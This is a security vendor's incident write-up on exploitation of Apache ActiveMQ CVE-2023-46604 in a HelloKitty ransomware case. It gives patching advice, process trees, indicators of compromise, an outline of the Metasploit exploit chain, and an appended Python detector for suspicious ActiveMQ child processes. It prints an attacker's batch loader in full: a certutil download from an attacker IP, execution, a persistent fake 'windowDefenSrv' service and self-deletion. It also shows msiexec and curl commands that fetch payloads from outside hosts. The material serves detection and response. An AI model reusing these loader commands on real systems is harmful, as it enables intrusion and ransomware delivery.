URL:
https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604
Submission: On November 06 via api from IN — Scanned from DE
Team Huntress | 11.2.2023 | 8 min read

CRITICAL VULNERABILITY: EXPLOITATION OF APACHE ACTIVEMQ CVE-2023-46604

A partner recently deployed Huntress agents on October 30, 2023, after experiencing a "HelloKitty" ransomware attack on October 27. This ransomware attack closely matched what Rapid7 described in their November 1 blog post, Suspected Exploitation of Apache ActiveMQ CVE-2023-46604.

WHAT IS CVE-2023-46604?

Rapid7 identified suspected exploitation of Apache ActiveMQ CVE-2023-46604. The CVE is a remote code execution vulnerability. Huntress has already seen this vulnerability being exploited in an environment we monitor. It is imperative that you patch your systems immediately.

PATCH IMMEDIATELY

If you are running Apache ActiveMQ, patches are available to address CVE-2023-46604 in the following versions: 5.15.16, 5.16.7, 5.17.6, and 5.18.3. To determine the version of ActiveMQ you are running, use the bundled command line tool: the version is listed by running activemq --version. Patches can be found here: https://activemq.apache.org/components/classic/download/

If you are unable to patch these systems, immediately block them from being accessible from the Internet, which will significantly limit the attack surface.

HUNTRESS OBSERVATIONS

The Huntress team received a number of signals indicative of remote commands issued via Apache ActiveMQ. As illustrated in Figure 1, the process lineage started with wrapper.exe and java.exe and resulted in a command processor execution.

Figure 1: Command Process Tree

The Huntress team's investigation determined that exploitation of Apache ActiveMQ was the root cause of this incident. Analysis of Windows Event Log data extracted from one endpoint indicated historical signs of compromise (prior to the Huntress agent being installed) that aligned with what Rapid7 observed. Specifically, MsiInstaller events indicated the start of installation for both http://172.245.16[.]125/m4.png and http://172.245.16[.]125/m2.png. However, neither package appeared to install successfully. One of the packages failed to install due to an error with C:\Windows\Installer\MSIB9E7.tmp, and the other completed, but C:\Windows\Installer\MSIBC6B.tmp was detected and quarantined by Windows Defender. Both *.png files were, in fact, MSI installer files packaged using exe2msiSetupPackage from QwertyLab, as illustrated in Figure 2.

Figure 2: MsiInstaller event ID 1033 event record message (Application Event Log)

Following this activity, the Huntress team observed the process tree illustrated in Figure 1, as well as in Figure 3, on multiple endpoints.

Figure 3: RuntimeBroker.msi Process Tree

The process tree for RuntimeBroker.msi, with full file paths, illustrated in Figure 3, appears as follows:

    C:\MRX\Apache\ActiveMQ\bin\win64\wrapper.exe
     -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
     -> "cmd.exe /c msiexec /q /i http://4.216.93[.]211:5981/RuntimeBroker.msi"

The command to download and install the RuntimeBroker.msi file via MSIExec does not appear to have succeeded on either endpoint, as there are no MsiInstaller event records visible in the Application Event Log for those endpoints during that time. Following the unsuccessful attempt to install RuntimeBroker.msi, the command illustrated in Figure 1 was observed on several endpoints. However, within a short period (a second or less), Windows Defender detected and quarantined the agent_w.exe file on that same endpoint. Even though agent_w.exe was quarantined, analysis of the retrieved file indicates that it attempts to connect to 137.175.17[.]172.

On November 2, the Huntress team was alerted to multiple endpoints executing curl requests to the URL hxxp://27.102.128[.]152:8098/bit[.]ico, as illustrated in Figure 4. This activity appeared to spawn from the execution of wrapper.exe located within a subdirectory of the ActiveMQ installation files, exactly as observed in the previous process trees.

Figure 4: Curl Process Tree

The Huntress team would like to note that activity of this nature was observed as early as October 10, as illustrated in Figure 5.

Figure 5: Process Creation Event from October 10, 2023

At the time that analysts responded to the alert illustrated in Figure 5, the system at IP address 45.32.120[.]181 was not accessible, but the win.bat file was retrieved from alternative sources and appears as follows:

    @echo off
    cmd /c certutil -urlcache -split -f http://45.32.120[.]181/x86.exe c:\users\public\86.dat
    cmd /c start /b c:\users\public\86.dat
    sc create windowDefenSrv binPath= "c:\users\public\86.dat windowDefenSrv" start= auto
    del c:\users\public\win.bat

At the time that the events were investigated, Huntress analysts found no additional, subsequent malicious activity on the endpoint, indicating that the infection process did not succeed. However, the process tree was identical to what was illustrated in Figures 1 and 3.

THE ATTACK LAB: EXPLOITATION PROOF OF CONCEPT

Exploitation for this attack is trivial. There is a Metasploit module that automates exploitation for this attack, and the Huntress team confirms that this module works like a charm against vulnerable instances of ActiveMQ. The exploit process unfolds in two stages:

* The attacker establishes a connection to ActiveMQ via the OpenWire protocol, typically running on port 61616.
* By sending a crafted OpenWire packet, the attacker prompts the system to unmarshal a class they control. This action triggers the vulnerable server to fetch and load a class configuration XML file from a remote URL, implying the attacker must have a pre-defined XML file hosted elsewhere.

The OpenWire protocol request originates from the attacker, but the request to load a remote class configuration XML file originates from the victim server.

The original writeup for this vulnerability includes the following example of the XML file's schema:

The loaded class calls the ProcessBuilder method to execute notepad.exe. In practice, the class configuration file will contain any of the well-known post-exploitation primitives like curl, certutil, powershell, and the like. In this example, we simply echo "worked" into C:\Windows\Temp\worked.txt to prove successful exploitation:

Figure 6: Running the Metasploit Module

We then see the new file in the vulnerable server's C:\Windows\Temp directory, which proves code execution:

Figure 7: Proof of Execution

We also see the requested class configuration file in the Wireshark HTTP stream for this example:

Figure 8: Reconstructed Network Traffic via Wireshark

INDICATORS OF COMPROMISE (IOCS)

Network indicators:

* 137.175.17[.]172
* 172.245.16[.]125:80
* 4.216.93[.]211:5981
* 27.102.128[.]152:8098
* 45.32.120[.]181

File indicators:

    File Name           Hash
    Agent_w.exe         dd13cf13c1fbdc76da63e76adcf36727cfe594e60af0dc823c5a509a13ae1e15
    RuntimeBroker.msi   4c9fa87e72fe59cf15131bd2f3bd7baa7a9555ceec438c1df78dd5d5b8394910

SIGMA DETECTOR

The Huntress DE&TH team has also released a public Sigma detector for this particular threat.

Huntress has added detections for the activity reported in this blog. If you'd like to have someone else watching your back while you work on patching, feel free to start a free trial with us so our 24/7 SOC can keep an eye out for you.

Special thanks to Josh Allman, Faith Stratton, Matthew Kiely, Matt Anderson, Sharon Martin, Harlan Carvey, and Joe Slowik for their contributions to this writeup.
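As an added illustration of the process lineage described under Huntress Observations (this is example code, not the Huntress post's own tooling or its Sigma rule), the following Python flags command interpreters and download utilities spawned beneath an ActiveMQ wrapper.exe -> java.exe chain, run over constructed Sysmon-style process-creation events. The ProcEvent field set, the 192.0.2.0/24 addresses and the severity tiers are assumptions; the lineage and the msiexec/curl/certutil primitives come from the post.

```python
import re
from dataclasses import dataclass

# Assumed minimal Sysmon EID 1 style process-creation record.
@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

# Constructed sample events, not Huntress telemetry; 192.0.2.0/24 is a documentation range.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\MRX\Apache\ActiveMQ\bin\win64\wrapper.exe", "wrapper.exe -s wrapper.conf"),
    ProcEvent(200, 100, r"C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe", "java.exe -jar activemq.jar"),
    ProcEvent(300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c msiexec /q /i http://192.0.2.10:5981/RuntimeBroker.msi"),
    ProcEvent(301, 200, r"C:\Windows\System32\curl.exe", "curl http://192.0.2.20:8098/bit.ico -o c:\\users\\public\\bit.ico"),
    ProcEvent(302, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c certutil -urlcache -split -f http://192.0.2.30/x86.exe c:\\users\\public\\86.dat"),
    ProcEvent(303, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe", "cmd.exe /c msiexec /q /i http://192.0.2.10:5981/RuntimeBroker.msi"),
]

# Interpreters and download primitives named in the post (cmd, curl, certutil, msiexec, powershell).
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "certutil.exe", "msiexec.exe"}
FETCH_RE = re.compile(r"msiexec\S*\s.*?/i\s+https?://|certutil\S*\s.*?-urlcache|curl\S*\s.*?https?://|bitsadmin", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(ev, by_pid):
    """Walk parent links upward, guarding against PID-reuse cycles."""
    seen, parent = set(), by_pid.get(ev.ppid)
    while parent is not None and parent.pid not in seen:
        seen.add(parent.pid)
        yield parent
        parent = by_pid.get(parent.ppid)

def under_activemq(ev, by_pid) -> bool:
    """True when the direct lineage is wrapper.exe (in an ActiveMQ path) -> java.exe -> ev."""
    chain = list(ancestors(ev, by_pid))
    return (len(chain) >= 2 and basename(chain[0].image) == "java.exe"
            and basename(chain[1].image) == "wrapper.exe" and "activemq" in chain[1].image.lower())

def detect(events):
    """Return (pid, severity, reason) for each child process matching the observed lineage."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) not in SUSPECT_CHILDREN or not under_activemq(ev, by_pid):
            continue
        urls = URL_RE.findall(ev.cmdline)
        if urls and FETCH_RE.search(ev.cmdline):
            hits.append((ev.pid, "high", f"remote fetch via {basename(ev.image)} from {urls[0]}"))
        else:
            hits.append((ev.pid, "medium", f"{basename(ev.image)} spawned beneath ActiveMQ wrapper.exe -> java.exe"))
    return hits
```

The same cmd.exe /c msiexec command under explorer.exe (pid 500) is deliberately not flagged, since the lineage rather than the command text is what ties the activity to ActiveMQ.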